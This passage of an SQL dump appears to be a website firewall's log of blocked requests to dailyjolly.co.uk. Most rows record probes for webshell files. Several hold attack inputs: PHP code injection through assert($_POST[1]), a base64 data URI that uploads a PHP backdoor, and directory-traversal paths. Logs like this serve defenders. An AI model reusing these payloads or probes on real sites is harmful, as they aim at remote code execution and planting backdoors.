User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11094,1673884387.613446,1673884387.491200,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11095,1673884386.411544,1673884386.278400,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11096,1673884372.595416,1673884372.423800,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11097,1673884295.923935,1673884295.794300,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11098,1673884258.370445,1673884258.236900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11099,1673884224.072781,1673884223.943100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11100,1673884199.713373,1673884199.577000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11101,1673884164.954169,1673884164.834700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11102,1673885641.505571,1673885641.371100,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/css/css.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Nzcy9jc3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11103,1673885571.454724,1673885571.311500,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11104,1673885456.943385,1673885456.790000,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11105,1673885394.627352,1673885394.485300,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11106,1673885369.967588,1673885369.834400,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/linkpreview/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW5rcHJldmlldy9kYi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11107,1673885349.142319,1673885348.999000,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/pridmag/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3ByaWRtYWcvZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11108,1673887045.363790,1673887045.243900,'\0\0\0\0\0\0\0\0\0\0��k��',0,403,0,0,0,'https://www.dailyjolly.co.uk//type.php?template=tag_%28%29%7B%7D%3B%40unlink%28FILE%29%3Bprint_r%28xbshell%29%3Bassert%28%24_POST%5B1%5D%29%3B%7B%2F%2F..%2Frss','https://www.dailyjolly.co.uk//type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0ZW1wbGF0ZV0=\",\"paramValue\":\"dGFnXygpe307QHVubGluayhGSUxFKTtwcmludF9yKHhic2hlbGwpO2Fzc2VydCgkX1BPU1RbMV0pO3svLy4uL3Jzcw==\",\"path\":\"Ly90eXBlLnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(11109,1673887054.691437,1673887054.572500,'\0\0\0\0\0\0\0\0\0\0��k��',0,403,0,0,0,'https://www.dailyjolly.co.uk//install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php','https://www.dailyjolly.co.uk//install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbnN0YWxsX2RlbW9fbmFtZV0=\",\"paramValue\":\"Li4vZGF0YS9hZG1pbi9jb25maWdfdXBkYXRlLnBocA==\",\"path\":\"Ly9pbnN0YWxsL2luZGV4LnBocC5iYWs=\",\"category\":\"traversal\",\"ssl\":1}'),(11110,1673887052.339180,1673887052.230300,'\0\0\0\0\0\0\0\0\0\0��k��',0,403,0,0,0,'https://www.dailyjolly.co.uk//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data%3Aimage%2Fphp%3Bbase64%2CeGJzaGVsbCUzQyUzRnBocCUwQSUyNHN0JTIwJTNEJTIwQGNyZWF0ZV9mdW5jdGlvbiUyOCUyNyUyNyUyQyUyMCUyNF9QT1NUJTVCJTI3aHhxOTkxMjE3JTI3JTVEJTI5JTNCJTBBJTI0c3QlMjglMjklM0I%3D','https://www.dailyjolly.co.uk//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,eGJzaGVsbCUzQyUzRnBocCUwQSUyNHN0JTIwJTNEJTIwQGNyZWF0ZV9mdW5jdGlvbiUyOCUyNyUyNyUyQyUyMCUyNF9QT1NUJTVCJTI3aHhxOTkxMjE3JTI3JTVEJTI5JTNCJTBBJTI0c3QlMjglMjklM0I=','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"ZGF0YTppbWFnZS9waHA7YmFzZTY0LGVHSnphR1ZzYkNVelF5VXpSbkJvY0NVd1FTVXlOSE4wSlRJd0pUTkVKVEl3UUdOeVpXRjBaVjltZFc1amRHbHZiaVV5T0NVeU55VXlOeVV5UXlVeU1DVXlORjlRVDFOVUpUVkNKVEkzYUhoeE9Ua3hNakUzSlRJM0pUVkVKVEk1SlROQ0pUQkJKVEkwYzNRbE1qZ2xNamtsTTBJPQ==\",\"path\":\"Ly9pbmRleC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(11111,1673887050.988745,1673887050.881600,'\0\0\0\0\0\0\0\0\0\0��k��',0,403,0,0,0,'https://www.dailyjolly.co.uk//plus/comments_frame.php','https://www.dailyjolly.co.uk//plus/comments_frame.php','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25lZWRDb2RlXQ==\",\"paramValue\":\"YWEvLi4vLi4vLi4vZGF0YS9teXNxbF9lcnJvcl90cmFjZQ==\",\"path\":\"Ly9wbHVzL2NvbW1lbnRzX2ZyYW1lLnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(11112,1673894147.927792,1673894147.773700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11113,1673894141.606173,1673894141.479400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11114,1673894138.865073,1673894138.752800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11115,1673894137.828972,1673894137.715200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11116,1673894136.766936,1673894136.652700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11117,1673894133.229350,1673894133.082100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11118,1673894132.136881,1673894132.025100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11119,1673894130.005726,1673894129.893000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11120,1673894128.953964,1673894128.838300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11121,1673894127.768443,1673894127.654300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11122,1673894127.206526,1673894127.086400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11123,1673894126.091277,1673894125.978500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11124,1673894125.082988,1673894124.954000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11125,1673894224.120840,1673894223.996000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11126,1673894223.601667,1673894223.486500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11127,1673894223.075590,1673894222.960000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11128,1673894222.557698,1673894222.447200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11129,1673894222.048188,1673894221.921400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11130,1673894221.521084,1673894221.372300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11131,1673894220.974592,1673894220.854300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11132,1673894220.460042,1673894220.336600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11133,1673894219.945004,1673894219.836800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11134,1673894219.445343,1673894219.336200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11135,1673894218.944433,1673894218.833900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11136,1673894218.439857,1673894218.311600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11137,1673894217.912173,1673894217.784000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 